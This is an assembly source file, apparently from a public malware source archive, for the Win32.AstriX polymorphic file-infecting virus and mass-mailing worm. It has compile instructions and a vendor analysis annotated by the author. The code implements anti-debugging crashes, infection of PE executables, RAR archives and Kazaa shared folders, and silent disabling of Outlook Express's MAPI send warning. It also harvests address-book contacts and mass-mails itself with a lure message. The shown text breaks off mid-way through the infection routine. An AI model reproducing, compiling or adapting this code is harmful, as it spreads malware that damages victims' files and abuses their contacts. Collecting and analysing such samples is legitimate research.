mirror of
https://github.com/vxunderground/MalwareSourceCode
synced 2024-06-28 18:02:48 +00:00
2102 lines
50 KiB
NASM
2102 lines
50 KiB
NASM
comment ~
|
|
|
|
[Information]
|
|
|
|
Virus Name:Win32.AstriX
|
|
Virus Author:DR-EF
|
|
Virus Size:8k
|
|
Target:PE file:exe\scr & rar archives
|
|
Features:
|
|
o Encrypted
|
|
o Polymorphic
|
|
o AntiDebugging
|
|
o P2P Worm
|
|
o MAIL Worm(using mapi)
|
|
Payload:MessageBox & Change windows titles
|
|
every year at 29/12
|
|
|
|
[Description]
|
|
|
|
Here is a virus description from Computer Associates:
|
|
(http://www3.ca.com/threatinfo/virusinfo/virus.aspx?id=38333)
|
|
|
|
my comments are between the [* *]
|
|
|
|
|
|
|
|
Win32.Astrool.12730 [* fuck off avers ,its Win32.Astrix !!! *]
|
|
Alias: W32/Dref@MM (McAfee),
|
|
Win32/Astrool.12730
|
|
Category: Win32
|
|
Type: Virus, Worm
|
|
|
|
|
|
|
|
CHARACTERISTICS:
|
|
---------------
|
|
Win32.Astrool.12730 is a polymorphic, encrypted file infecting virus,
|
|
as well as a worm that can spread via e-mail using the Simple MAPI
|
|
protocol.[* wow,i didnt know that there is Simple mapi protocol ? *]
|
|
It also targets files being shared by Kazaa, enabling it
|
|
to spread via peer-to-peer file sharing.
|
|
|
|
Method of Installation:
|
|
-----------------------
|
|
Astrool.12730 does not install itself on the system directly.
|
|
As a traditional virus, it implants itself by infecting files on the system.
|
|
|
|
Method of Distribution:
|
|
-----------------------
|
|
|
|
Via File Infection:
|
|
|
|
When run, Astrool.12730 searches for and infects Windows PE executable
|
|
files in the current directory,[* and in two upper directorys ! *]
|
|
and in Kazaa shared directories. It finds these shared directories
|
|
by reading this registry value:
|
|
|
|
HKEY_CURRENT_USER\Software\Kazaa\LocalContent\dir0
|
|
|
|
This enables it to spread through executable files shared through Kazaa.
|
|
The virus infects files with the extensions .exe and .scr. It also attempts
|
|
to add itself to RAR archives (*.rar), if it finds any.
|
|
|
|
The virus is polymorphic, meaning every instance of the virus appears different.
|
|
|
|
Via E-mail:
|
|
|
|
Astrool.12730 sends itself via e-mail only at particular times and dates
|
|
- the minutes must be 50 or higher, the secconds 30 or lower, and the day
|
|
of the month must be the 15th or earlier. If the time matches, it then checks
|
|
for an active Internet connection by attempting to connect to http://www.cnn.com/.
|
|
|
|
If the connection is successful, it begins its e-mail routine. First,
|
|
it sets the following registry value:
|
|
|
|
HKEY_CURRENT_USER\Identities\(Default User ID)\Software\Microsoft
|
|
\Outlook Express\5.0\Mail\Warn on Mapi Send = 0x0
|
|
|
|
Where (Default User ID) is read from the value:
|
|
|
|
HKEY_CURRENT_USER\Identities\Default User ID
|
|
|
|
This will stop Outlook Express from warning the user when another program
|
|
attempts to send mail through it using MAPI.
|
|
|
|
Next, it finds the default Windows Address Book (WAB) file from the following
|
|
registry value:
|
|
|
|
HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4\Wab File Name
|
|
|
|
It then uses Simple MAPI commands to send itself to all addresses it finds
|
|
in the WAB file. The messages appear as follows:
|
|
|
|
Subject:
|
|
i have cooool stuff for you !
|
|
|
|
Body:
|
|
hi
|
|
take a look at whate i find in the net !
|
|
its very cool program,check it out :-)
|
|
and tell me if you like it,ok
|
|
bye
|
|
|
|
The attachment will be the file that sent the message. The file name and size
|
|
therefore vary depending on the infected host file.
|
|
|
|
Note: In lab tests, the virus only successfully sent e-mails on systems using
|
|
Outlook Express version 6.
|
|
|
|
Payload:
|
|
-------
|
|
If the date is 29 December, the virus displays the following message box:
|
|
|
|
Win32.Astrix Virus Coded By DR-EF All Right Reserved
|
|
|
|
It also replaces text labels in many open windows with this message:
|
|
|
|
Win32.Astrix Virus Coded By DR-EF All Right Reserved
|
|
|
|
Analysis by Hamish O'Dea
|
|
|
|
|
|
[How To Compile]
|
|
|
|
tasm32 /m3 /ml /zi Astrix.asm , , ;
|
|
tlink32 /tpe /aa /v astrix , astrix , ,import32.lib
|
|
pewrsec Astrix.exe
|
|
|
|
~
|
|
.386
|
|
.model flat
|
|
|
|
extrn MessageBoxA:proc ;apis for the first generation
|
|
extrn ExitProcess:proc
|
|
|
|
virus_size equ End_Astrix - Astrix
|
|
loader_size equ end_virus_decryptor-virus_decryptor
|
|
.data
|
|
|
|
db ?
|
|
.code
|
|
|
|
Astrix:
|
|
mov esp,[esp + 8h]
|
|
pop dword ptr fs:[0]
|
|
add esp,4h
|
|
call decrypt_virus
|
|
start_ecrypt: mov esp,[esp + 8h]
|
|
pop dword ptr fs:[0] ;remove SEH
|
|
add esp,4h
|
|
call get_delta
|
|
get_delta: pop ebp
|
|
sub ebp,offset get_delta
|
|
first_g: call find_kernel ;first generation start here
|
|
jnc execute_host
|
|
call get_proc_addr
|
|
mov ecx,number_of_apis
|
|
lea eax,[ebp + api_strings]
|
|
lea ebx,[ebp + api_addresses]
|
|
mov edx,[ebp + kernel_base]
|
|
call get_apis
|
|
jnc execute_host
|
|
call create_key
|
|
mov word ptr [ebp + xor_ax_key+2],ax
|
|
call create_key
|
|
mov byte ptr [ebp + xor_al_key+1],al
|
|
mov byte ptr [ebp + mov_cl_key+1],ah
|
|
pushad
|
|
xor ebx,ebx
|
|
lea eax,[ebp + crash_debugger]
|
|
push eax
|
|
push dword ptr fs:[ebx] ;set SEH
|
|
mov fs:[ebx],esp
|
|
mov dword ptr [ebx],eax ;bye bye
|
|
crash_virus: mov ecx,(End_Astrix-crash_debugger)
|
|
crash: inc eax
|
|
mov word ptr [eax],0f0bh ;UD2 - undefined instruction
|
|
loop crash
|
|
mov ecx,(overwrite_all-Astrix)
|
|
lea eax,[ebp + Astrix]
|
|
overwrite_all: inc eax
|
|
mov word ptr [eax],0f0bh ;UD2 - undefined instruction
|
|
loop overwrite_all
|
|
crash_debugger: mov esp,[esp + 8h]
|
|
pop dword ptr fs:[0] ;remove SEH
|
|
add esp,4h
|
|
popad
|
|
lea eax,[ebp + IsDebuggerPresent_api]
|
|
push eax
|
|
push [ebp + kernel_base]
|
|
call [ebp + _GetProcAddress]
|
|
cmp eax,0h
|
|
je check_debugger2
|
|
call eax
|
|
xchg eax,ecx
|
|
lea eax,[ebp + crash_debugger]
|
|
dec ecx
|
|
jcxz crash_virus
|
|
check_debugger2:mov ecx,fs:[20h]
|
|
jcxz no_debugger1
|
|
lea eax,[ebp + crash_debugger]
|
|
jmp crash_virus
|
|
no_debugger1: call infect_current_and_upper_directory
|
|
call infect_kazaa_shared_files
|
|
call send_virus_via_mail
|
|
call payload
|
|
execute_host: popad
|
|
db 64h,0A1h,0,0,0,0 ;mov eax,fs:[00000000]
|
|
ret
|
|
IsDebuggerPresent_api db "IsDebuggerPresent",0h
|
|
payload:
|
|
lea eax,[ebp + SYSTEMTIME]
|
|
push eax
|
|
call [ebp + _GetLocalTime]
|
|
;check trigger:
|
|
cmp [ebp + wMonth],0ch
|
|
jne exit_payload
|
|
cmp [ebp + wDay],1dh
|
|
jne exit_payload
|
|
lea eax,[ebp + user32_dll]
|
|
push eax
|
|
call [ebp + _LoadLibrary]
|
|
cmp eax,0h
|
|
je exit_payload
|
|
push eax ;save module handle
|
|
xchg ebx,eax
|
|
lea eax,[ebp + SetWindowTextA]
|
|
push eax
|
|
push ebx
|
|
call [ebp + _GetProcAddress]
|
|
cmp eax,0h
|
|
je exit_payload
|
|
mov [ebp + SetWindowText],eax
|
|
mov ecx,0ffffh
|
|
pay_load: push ecx
|
|
lea eax,[ebp + copyright]
|
|
push eax
|
|
push ecx
|
|
call [ebp + SetWindowText]
|
|
pop ecx
|
|
loop pay_load
|
|
lea eax,[ebp + MessageBoxA2]
|
|
pop ebx
|
|
push eax
|
|
push ebx
|
|
call [ebp + _GetProcAddress]
|
|
cmp eax,0h
|
|
je exit_payload
|
|
lea ebx,[ebp + copyright]
|
|
push MB_ICONINFORMATION or MB_SYSTEMMODAL
|
|
push ebx
|
|
push ebx
|
|
push 0
|
|
call eax
|
|
exit_payload: ret
|
|
user32_dll db "User32.dll",0
|
|
SetWindowTextA db "SetWindowTextA",0
|
|
MessageBoxA2 db "MessageBoxA",0
|
|
SetWindowText dd 0
|
|
MB_SYSTEMMODAL equ 00001000h
|
|
MB_ICONINFORMATION equ 00000040h
|
|
SYSTEMTIME:
|
|
wYear dw 0
|
|
wMonth dw 0
|
|
wDayOfWeek dw 0
|
|
wDay dw 0
|
|
wHour dw 0
|
|
wMinute dw 0
|
|
wSecond dw 0
|
|
wMilliseconds dw 0
|
|
|
|
create_key:
|
|
call [ebp + _GetTickCount]
|
|
mov [ebp + rndnm],eax
|
|
rnd_num: mov cx,ax ;this code is useless,but i didnt
|
|
ror eax,cl ;remove it when i relese it,because
|
|
mov cl,al ;i didnt had time to change my code.
|
|
dec ecx
|
|
mul cx
|
|
shr eax,1h
|
|
add eax,2h
|
|
ret
|
|
random_number:
|
|
mov eax,[ebp + rndnm]
|
|
call rnd_num
|
|
xchg eax,ecx
|
|
call [ebp + _GetTickCount]
|
|
add eax,ecx
|
|
mov [ebp + rndnm],eax
|
|
ret
|
|
rndnm dd 0h
|
|
|
|
infect_kazaa_shared_files:
|
|
;set SEH:
|
|
pushad
|
|
lea eax,[ebp + kazaa_error_handle]
|
|
push eax
|
|
xor eax,eax
|
|
push dword ptr fs:[eax]
|
|
mov fs:[0],esp
|
|
lea eax,[ebp + advapi32_dll]
|
|
push eax
|
|
call [ebp + _LoadLibrary]
|
|
cmp eax,0h
|
|
je mail_err
|
|
mov edx,eax
|
|
mov ecx,4h
|
|
lea eax,[ebp + reg_funcs]
|
|
lea ebx,[ebp + reg_funcs_add]
|
|
call get_apis
|
|
jnc kazaa_error
|
|
lea eax,[ebp + hkey]
|
|
push eax
|
|
push KEY_QUERY_VALUE
|
|
push 0h
|
|
lea eax,[ebp + dirs_location]
|
|
push eax
|
|
push HKEY_CURRENT_USER
|
|
call [ebp + _RegOpenKeyEx]
|
|
cmp eax,0h
|
|
jne kazaa_error
|
|
next_kazaa_dir: mov [ebp + val_s],000000ffh
|
|
mov [ebp + val],0h
|
|
mov [ebp + val_type],0h
|
|
lea eax,[ebp + val_s]
|
|
push eax
|
|
lea eax,[ebp + val]
|
|
push eax
|
|
lea eax,[ebp + val_type]
|
|
push eax
|
|
push 0h
|
|
lea eax,[ebp + dir_n]
|
|
push eax
|
|
push [ebp + hkey]
|
|
call [ebp + _RegQueryValueEx]
|
|
cmp eax,0h
|
|
jne kazaa_close_key
|
|
lea eax,[ebp + val]
|
|
add eax,7h
|
|
call infect_directory
|
|
lea eax,[ebp + dir_n]
|
|
add eax,3h
|
|
inc byte ptr [eax]
|
|
cmp byte ptr [eax],3ah
|
|
jne next_kazaa_dir
|
|
kazaa_close_key:
|
|
push [ebp + hkey]
|
|
call [ebp + _RegCloseKey]
|
|
kazaa_error:
|
|
;remove SEH
|
|
pop dword ptr fs:[0]
|
|
add esp,4h
|
|
popad
|
|
ret
|
|
kazaa_error_handle:
|
|
mov esp,[esp + 8h]
|
|
pop dword ptr fs:[0]
|
|
add esp,4h
|
|
popad
|
|
ret
|
|
dirs_location db "Software\Kazaa\LocalContent",0
|
|
dir_n db "dir",30h,0h
|
|
val_s dd 0ffh
|
|
val db 0ffh dup(0)
|
|
val_type dd 0h
|
|
|
|
send_virus_via_mail:
|
|
;check some conditions before sending mails:
|
|
lea eax,[ebp + SYSTEMTIME]
|
|
push eax
|
|
call [ebp + _GetLocalTime]
|
|
cmp [ebp + wMinute],32h
|
|
jb mail_err
|
|
cmp [ebp + wDay],0fh
|
|
ja mail_err
|
|
cmp [ebp + wSecond],1eh
|
|
ja mail_err
|
|
lea eax,[ebp + advapi32_dll]
|
|
push eax
|
|
call [ebp + _LoadLibrary]
|
|
cmp eax,0h
|
|
je mail_err
|
|
mov edx,eax
|
|
mov ecx,4h
|
|
lea eax,[ebp + reg_funcs]
|
|
lea ebx,[ebp + reg_funcs_add]
|
|
call get_apis
|
|
jnc mail_err
|
|
;check if there is active internet connection:
|
|
lea eax,[ebp + wininet_dll]
|
|
push eax
|
|
call [ebp + _LoadLibrary]
|
|
cmp eax,0h
|
|
je mail_err
|
|
xchg eax,ebx
|
|
lea eax,[ebp + InternetCheckConnection]
|
|
push eax
|
|
push ebx
|
|
call [ebp + _GetProcAddress]
|
|
cmp eax,0h
|
|
je mail_err
|
|
xchg eax,ecx
|
|
push 0h
|
|
push FLAG_ICC_FORCE_CONNECTION
|
|
lea eax,[ebp + site_to_check]
|
|
push eax
|
|
call ecx
|
|
cmp eax,0h
|
|
je mail_err
|
|
mov eax,fs:[20h] ;do something nice.
|
|
cmp eax,0h
|
|
je no_debugger2
|
|
lea eax,[ebp + crash_debugger]
|
|
jmp crash_virus
|
|
;disable outlook express virus protection:
|
|
no_debugger2: lea eax,[ebp + hkey]
|
|
push eax
|
|
push 0h
|
|
push KEY_QUERY_VALUE
|
|
lea eax,[ebp + key_name]
|
|
push eax
|
|
push HKEY_CURRENT_USER
|
|
call [ebp + _RegOpenKeyEx]
|
|
cmp eax,0h
|
|
jne search_mails
|
|
lea eax,[ebp + id_size]
|
|
push eax
|
|
lea eax,[ebp + user_id]
|
|
push eax
|
|
xor eax,eax
|
|
push eax
|
|
push eax
|
|
lea eax,[ebp + id]
|
|
push eax
|
|
push [ebp + hkey]
|
|
call [ebp + _RegQueryValueEx]
|
|
cmp eax,0h
|
|
jne close_p_keys
|
|
lea eax,[ebp + hkey2]
|
|
push eax
|
|
push KEY_WRITE
|
|
push 0h
|
|
lea eax,[ebp + user_id]
|
|
push eax
|
|
push [ebp + hkey]
|
|
call [ebp + _RegOpenKeyEx]
|
|
cmp eax,0h
|
|
jne close_p_keys
|
|
push [ebp + hkey]
|
|
call [ebp + _RegCloseKey]
|
|
lea eax,[ebp + hkey]
|
|
push eax
|
|
push KEY_WRITE
|
|
push 0h
|
|
lea eax,[ebp + mapi_k]
|
|
push eax
|
|
push [ebp + hkey2]
|
|
call [ebp + _RegOpenKeyEx]
|
|
cmp eax,0h
|
|
jne close_p_keys
|
|
push 4h ;dd
|
|
lea eax,[ebp + protection_off]
|
|
push eax
|
|
push REG_DWORD
|
|
push 0h
|
|
lea eax,[ebp + mapi_virus_p]
|
|
push eax
|
|
push [ebp + hkey]
|
|
call [ebp + _RegSetValueExA]
|
|
close_p_keys: push [ebp + hkey]
|
|
call [ebp + _RegCloseKey]
|
|
push [ebp + hkey2]
|
|
call [ebp + _RegCloseKey]
|
|
;search emails:
|
|
search_mails:
|
|
lea eax,[ebp + hkey]
|
|
push eax
|
|
xor eax,eax
|
|
push eax
|
|
push eax
|
|
lea eax,[ebp + wab_location]
|
|
push eax
|
|
push HKEY_CURRENT_USER
|
|
call [ebp + _RegOpenKeyEx]
|
|
cmp eax,0h
|
|
jne mail_err
|
|
lea eax,[ebp + sizeof_wab_path]
|
|
push eax
|
|
lea eax,[ebp + wab_path]
|
|
push eax
|
|
xor eax,eax
|
|
push eax
|
|
push eax
|
|
push eax
|
|
push [ebp + hkey]
|
|
call [ebp + _RegQueryValueEx]
|
|
cmp eax,0h
|
|
jne mail_err
|
|
push [ebp + hkey]
|
|
call [ebp + _RegCloseKey]
|
|
cmp eax,0h
|
|
jne mail_err
|
|
lea ebx,[ebp + wab_path]
|
|
lea eax,[ebp + WIN32_FIND_DATA]
|
|
push eax
|
|
push ebx
|
|
Call [ebp + _FindFirstFile]
|
|
cmp eax,0h
|
|
je mail_err
|
|
lea ebx,[ebp + wab_path]
|
|
call open_file
|
|
cmp eax,INVALID_HANDLE_VALUE
|
|
je mail_err
|
|
mov [ebp + opened_file_handle],eax
|
|
mov eax,[ebp + nFileSizeLow]
|
|
call create_map
|
|
cmp eax,0h
|
|
je mail_err
|
|
mov [ebp + map_handle],eax
|
|
mov eax,[ebp + nFileSizeLow]
|
|
call map_view
|
|
cmp eax,0h
|
|
je mail_err
|
|
mov [ebp + map_base],eax
|
|
;check how much memory we need to allocate for emails:
|
|
mov ax,word ptr [eax + 64h]
|
|
cmp ax,1h
|
|
je unmapwab
|
|
mov cx,44h ;every mail allocate 68 bytes
|
|
mul cx
|
|
;ax-how much memory to allocate
|
|
xor ebx,ebx
|
|
mov bx,ax
|
|
push ebx
|
|
push GPTR
|
|
call [ebp + _GlobalAlloc]
|
|
cmp eax,0h
|
|
je unmapwab
|
|
mov [ebp + allocated_memory_handle],eax
|
|
;start to read all emails from wab file:
|
|
xchg eax,ebx
|
|
xor ecx,ecx
|
|
mov eax,[ebp + map_base]
|
|
mov cx,word ptr [eax + 64h]
|
|
add eax,[eax + 60h]
|
|
mov [ebp + number_of_mails],cx
|
|
;eax - addresses in wab
|
|
;ebx - allocated memory
|
|
;cx - number of addreses
|
|
next_mail:
|
|
push ecx
|
|
mov ecx,44h
|
|
copy_mail: cmp byte ptr [eax],0h
|
|
je move_to_next_mail
|
|
mov dl,byte ptr [eax]
|
|
mov byte ptr [ebx],dl
|
|
inc ebx
|
|
add eax,2h
|
|
dec ecx
|
|
loop copy_mail
|
|
move_to_next_mail:
|
|
add eax,ecx
|
|
inc ebx
|
|
mov byte ptr [ebx],0h
|
|
pop ecx
|
|
loop next_mail
|
|
unmapwab:
|
|
push [ebp + map_base]
|
|
call [ebp + _UnmapViewOfFile]
|
|
push [ebp + map_handle]
|
|
call [ebp + _CloseHandle]
|
|
push [ebp + opened_file_handle]
|
|
call [ebp + _CloseHandle]
|
|
;--------------LogIn:
|
|
lea eax,[ebp + mapi_dll]
|
|
push eax
|
|
call [ebp + _LoadLibrary]
|
|
cmp eax,0h
|
|
je mail_err
|
|
mov edx,eax
|
|
mov ecx,3h
|
|
lea eax,[ebp + mapi_funcs]
|
|
lea ebx,[ebp + mapi_func_add]
|
|
call get_apis
|
|
jnc free_mails_mem
|
|
lea eax,[ebp + mapi_session_handle]
|
|
push eax
|
|
xor eax,eax
|
|
push eax
|
|
push eax
|
|
push MAPI_NEW_SESSION
|
|
push eax
|
|
push eax
|
|
call [ebp + _MAPILogon]
|
|
cmp eax,0h
|
|
jne mail_err
|
|
;-----------Get The Infected FileName:
|
|
push 0ffh
|
|
lea eax,[ebp + infected_file]
|
|
push eax
|
|
push 0h
|
|
call [ebp + _GetModuleFileName]
|
|
cmp eax,0h
|
|
je log_off
|
|
;----------SendMail:
|
|
xor ecx,ecx
|
|
mov cx,[ebp + number_of_mails]
|
|
inc cx
|
|
mov ebx,[ebp + allocated_memory_handle]
|
|
send_next_mail:
|
|
dec ecx
|
|
push ecx
|
|
lea eax,[ebp + subject]
|
|
mov [ebp + lpszSubject],eax
|
|
lea eax,[ebp + message]
|
|
mov [ebp + lpszNoteText],eax
|
|
lea eax,[ebp + MapiRecipDesc2]
|
|
mov [ebp + lpOriginator],eax
|
|
lea eax,[ebp + MapiRecipDesc]
|
|
mov [ebp + lpRecips],eax
|
|
lea eax,[ebp + MapiFileDesc]
|
|
mov [ebp + lpFiles],eax
|
|
;set the recipient:
|
|
mov [ebp + lpszName],ebx ; address from the allocated memory
|
|
mov [ebp + lpszAddress],ebx
|
|
;set the attachment structure:
|
|
lea eax,[ebp + infected_file]
|
|
mov [ebp + lpszPathName],eax
|
|
;send the mail:
|
|
push 0h
|
|
push MAPI_NEW_SESSION
|
|
lea eax,[ebp + offset MapiMessage]
|
|
push eax
|
|
xor eax,eax
|
|
push eax
|
|
push eax
|
|
call [ebp + _MAPISendMail]
|
|
pop ecx
|
|
cmp eax,0h
|
|
jne log_off
|
|
next_address:
|
|
inc ebx
|
|
cmp byte ptr [ebx],0h
|
|
jne next_address
|
|
inc ebx
|
|
cmp cx,0h
|
|
jne send_next_mail
|
|
;----------LogOff
|
|
log_off:
|
|
xor eax,eax
|
|
push eax
|
|
push eax
|
|
push eax
|
|
push [ebp + mapi_session_handle]
|
|
call [ebp + _MAPILogoff]
|
|
;----------FreeMemory:
|
|
free_mails_mem: push [ebp + allocated_memory_handle]
|
|
call [ebp + _GlobalFree]
|
|
mail_err:
|
|
ret
|
|
InternetCheckConnection db "InternetCheckConnectionA",0
|
|
wininet_dll db "Wininet.dll",0
|
|
site_to_check db "http://www.cnn.com/",0
|
|
FLAG_ICC_FORCE_CONNECTION equ 00000001h
|
|
;outlook express protection:
|
|
hkey2 dd 0h
|
|
key_name db "Identities",0h
|
|
id db "Default User ID",0h
|
|
user_id db 64h dup(0h)
|
|
id_size dd 64h
|
|
id_type dd 0h
|
|
mapi_virus_p db "Warn on Mapi Send",0
|
|
mapi_k db "Software\Microsoft\Outlook Express\5.0\Mail",0
|
|
protection_off dd 0h
|
|
;mapi data:
|
|
MAPI_NEW_SESSION equ 00000002h
|
|
mapi_dll db "mapi32.dll",0
|
|
mapi_funcs: MAPILogon db "MAPILogon",0
|
|
MAPILogoff db "MAPILogoff",0
|
|
MAPISendMail db "MAPISendMail",0
|
|
mapi_func_add: _MAPILogon dd 0
|
|
_MAPILogoff dd 0
|
|
_MAPISendMail dd 0
|
|
mapi_session_handle dd 0
|
|
wab_location db "Software\Microsoft\WAB\WAB4\Wab File Name",0
|
|
wab_path db 0ffh dup(0)
|
|
sizeof_wab_path dd 0ffh
|
|
number_of_mails dw 0
|
|
subject db "i have cooool stuff for you !",0
|
|
message db "hi",0dh,0ah,"take a look at whate i find in the net !",0dh,0ah,"its very cool program,check it out :-)",0dh,0ah,"and tell me if you like it,ok",0dh,0ah,"bye",0
|
|
;MapiMessage Structure:
|
|
MapiMessage:
|
|
ulReserved dd 0
|
|
lpszSubject dd 0
|
|
lpszNoteText dd 0
|
|
lpszMessageType dd 0
|
|
lpszDateReceived dd 0
|
|
lpszConversationID dd 0
|
|
flFlags1 dd 0
|
|
lpOriginator dd 0
|
|
nRecipCount dd 1h
|
|
lpRecips dd 0
|
|
nFileCount dd 1h
|
|
lpFiles dd 0
|
|
;MapiFileDesc Structure:
|
|
MapiFileDesc:
|
|
ulReserved2 dd 0
|
|
flFlags2 dd 0
|
|
nPosition dd 0
|
|
lpszPathName dd 0 ;infected file
|
|
lpszFileName dd 0
|
|
lpFileType dd 0
|
|
;MapiRecipDesc Structure:
|
|
MapiRecipDesc:
|
|
ulReserved3 dd 0
|
|
ulRecipClass dd 1
|
|
lpszName dd 0
|
|
lpszAddress dd 0
|
|
ulEIDSize dd 0
|
|
lpEntryID dd 0
|
|
MapiRecipDesc2:
|
|
ulReserved4 dd 0
|
|
ulRecipClass2 dd 0
|
|
lpszName2 dd 0
|
|
lpszAddress2 dd 0
|
|
ulEIDSize2 dd 0
|
|
lpEntryID2 dd 0
|
|
|
|
infect_current_and_upper_directory:
|
|
mov eax,fs:[20h]
|
|
cmp eax,0h
|
|
je no_debugger
|
|
xor esp,esp ;fuck up debugger !
|
|
no_debugger: mov [ebp + infection_counter],0h
|
|
mov [ebp + directory_level],0h
|
|
lea eax,[ebp + cur_dir]
|
|
push eax
|
|
push max_path
|
|
call [ebp + _GetCurrentDirectory]
|
|
cmp eax,max_path
|
|
ja buffer_not_good
|
|
lea eax,[ebp + Current_Directory]
|
|
push eax
|
|
push max_path
|
|
call [ebp + _GetCurrentDirectory]
|
|
cmp eax,max_path
|
|
ja buffer_not_good
|
|
mov [ebp + directory_name_size],eax
|
|
lea eax,[ebp + Current_Directory]
|
|
call infect_directory
|
|
up_dir: lea ebx,[ebp + Current_Directory]
|
|
mov eax,[ebp + directory_name_size]
|
|
add ebx,eax
|
|
inc ebx
|
|
up_search: cmp byte ptr [ebx],'\'
|
|
je end_search
|
|
mov byte ptr [ebx],0h
|
|
dec ebx
|
|
jmp up_search
|
|
end_search:
|
|
mov byte ptr [ebx],0h
|
|
dec ebx
|
|
cmp byte ptr [ebx],':' ;we are in the root ?
|
|
je restore_cur_dir
|
|
lea eax,[ebp + Current_Directory]
|
|
call infect_directory
|
|
cmp [ebp + directory_level],2h ;infect 2 uppers directorys
|
|
jbe up_dir
|
|
restore_cur_dir:
|
|
lea eax,[ebp + cur_dir]
|
|
push eax
|
|
call [ebp + _SetCurrentDirectory]
|
|
buffer_not_good:
|
|
ret
|
|
directory_level db 0h
|
|
cur_dir db max_path dup(0)
|
|
infect_directory:
|
|
;eax - pointer to directory name
|
|
push eax
|
|
call [ebp + _SetCurrentDirectory]
|
|
cmp eax,0h
|
|
je search_error
|
|
lea eax,[ebp + WIN32_FIND_DATA]
|
|
push eax
|
|
lea eax,[ebp + search_mask]
|
|
push eax
|
|
call [ebp + _FindFirstFile]
|
|
cmp eax,INVALID_HANDLE_VALUE
|
|
je search_error
|
|
mov [ebp + file_handle],eax
|
|
next_file:
|
|
cmp [ebp + infection_counter],6h
|
|
jae search_error
|
|
lea eax,[ebp + cFileName]
|
|
@@1: cmp byte ptr [eax],0h
|
|
je check_ex
|
|
cmp byte ptr [eax],'v' ;dont infect files with 'v' in they name
|
|
je _unknow
|
|
inc eax
|
|
jmp @@1
|
|
check_ex:
|
|
sub eax,4h
|
|
cmp dword ptr [eax],"exe."
|
|
je pe_file
|
|
cmp dword ptr [eax],"EXE."
|
|
je pe_file
|
|
cmp dword ptr [eax],"RCS."
|
|
je pe_file
|
|
cmp dword ptr [eax],"rcs."
|
|
je pe_file
|
|
cmp dword ptr [eax],"rar."
|
|
je rar_file
|
|
cmp dword ptr [eax],"RAR."
|
|
je rar_file
|
|
jmp _unknow
|
|
rar_file: call infect_rar
|
|
jmp _unknow
|
|
pe_file: call infect_pe
|
|
_unknow: lea eax,[ebp + WIN32_FIND_DATA]
|
|
push eax
|
|
push [ebp + file_handle]
|
|
call [ebp + _FindNextFile]
|
|
cmp eax,0
|
|
jne next_file
|
|
search_error:
|
|
inc [ebp + directory_level]
|
|
ret
|
|
infect_pe:
|
|
mov eax,[ebp + nFileSizeLow]
|
|
call pad_size
|
|
cmp edx,0h
|
|
je error_1
|
|
mov ebx,[ebp + dwFileAttributes]
|
|
mov [ebp + file_old_attributes],ebx
|
|
lea ebx,[ebp + cFileName]
|
|
push FILE_ATTRIBUTE_NORMAL
|
|
push ebx
|
|
call [ebp + _SetFileAttributes]
|
|
cmp eax,0h
|
|
je error_1
|
|
;do not infect files that are smaller than 10kb
|
|
cmp [ebp + nFileSizeLow],2800h
|
|
jb error
|
|
;do not infect files that are bigger than 3mb
|
|
cmp [ebp + nFileSizeLow],300000h
|
|
ja error
|
|
call open_file
|
|
cmp eax,INVALID_HANDLE_VALUE
|
|
je error
|
|
mov [ebp + opened_file_handle],eax
|
|
lea eax,[ebp + last_write_time]
|
|
push eax
|
|
lea eax,[ebp + last_access_time]
|
|
push eax
|
|
lea eax,[ebp + creation_time]
|
|
push eax
|
|
push [ebp + opened_file_handle]
|
|
call [ebp + _GetFileTime]
|
|
mov eax,[ebp + nFileSizeLow]
|
|
add eax,virus_size ;eax=host size + virus size
|
|
call pad_size
|
|
push eax
|
|
call create_map
|
|
cmp eax,0h
|
|
je error_close_file
|
|
mov [ebp + map_handle],eax
|
|
pop eax
|
|
call map_view
|
|
cmp eax,0h
|
|
je error_close_map
|
|
mov [ebp + map_base],eax
|
|
;set SEH:
|
|
pushad
|
|
lea ebx,[ebp + _infection_error_handle]
|
|
push ebx
|
|
xor ebx,ebx
|
|
push dword ptr fs:[ebx]
|
|
mov fs:[ebx],esp
|
|
cmp word ptr [eax],"ZM" ;check MZ sign
|
|
jne cant_infect
|
|
add eax,[eax + 3ch]
|
|
cmp word ptr [eax],"EP" ;check PE sign
|
|
jne cant_infect
|
|
mov bx,word ptr [eax + 06h]
|
|
mov [ebp + number_of_sections],bx ;save number of sections
|
|
mov ebx,[eax + 74h]
|
|
mov [ebp + number_directories_entries],ebx
|
|
mov ebx,eax
|
|
add ebx,18h ;ebx = pe optional header
|
|
mov ecx,[ebx + 24h] ;ecx=file alignment
|
|
mov [ebp + file_alignment],ecx
|
|
;infect only files that have file alignment of 200h or 1000h
|
|
cmp ecx,200h
|
|
jne check_1000h
|
|
jmp file_alignment_ok
|
|
check_1000h:
|
|
cmp ecx,1000h
|
|
jne cant_infect
|
|
file_alignment_ok:
|
|
mov ecx,[ebx + 1ch] ;ecx=image_base
|
|
mov [ebp + host_image_base],ecx
|
|
;ok we got all information that we need from the pe optional header
|
|
;lets find the code section:
|
|
push eax
|
|
push ebx
|
|
mov ecx,[ebp + number_directories_entries]
|
|
shl ecx,3h ; 2^3=8(directory size)
|
|
mov ebx,eax ;ebx point to pe header
|
|
add ebx,78h ;ebx=pe header + optional pe header
|
|
add ebx,ecx ;ebx=first section header
|
|
xor ecx,ecx
|
|
mov cx,word ptr [eax + 6h] ; cx=number of sections
|
|
next_section: cmp dword ptr [ebx],"xet." ; .text ?
|
|
je found_code_section
|
|
cmp dword ptr [ebx],"doc." ; .code ?
|
|
je found_code_section
|
|
cmp dword ptr [ebx],"EDOC" ; CODE ?
|
|
je found_code_section
|
|
add ebx,28h
|
|
loop next_section
|
|
jmp canot_infect_file
|
|
found_code_section:
|
|
;check if section has code attributes:
|
|
mov eax,[ebx + 24h]
|
|
and al,20h
|
|
cmp al,0h
|
|
je canot_infect_file
|
|
;lets check if we have room to put virus loader
|
|
mov eax,dword ptr [ebx + 8h]
|
|
mov ecx,dword ptr [ebx + 10h]
|
|
cmp ecx,64h ;minimum size of code section
|
|
jb canot_infect_file
|
|
sub ecx,eax
|
|
cmp ecx,(loader_size*2)
|
|
jb canot_infect_file
|
|
;save size of free space:
|
|
sub ecx,loader_size
|
|
shr ecx,1h
|
|
mov [ebp + free_space],ecx
|
|
;ebx = code section
|
|
;let's save the address where the loader will be writen
|
|
mov eax,[ebp + map_base] ;start of the file !
|
|
mov ecx,[ebx + 14h] ;pointer to section raw data
|
|
add ecx,eax
|
|
add ecx,[ebx + 8h ] ;virtual size
|
|
mov [ebp + where_to_write_decryptor],ecx
|
|
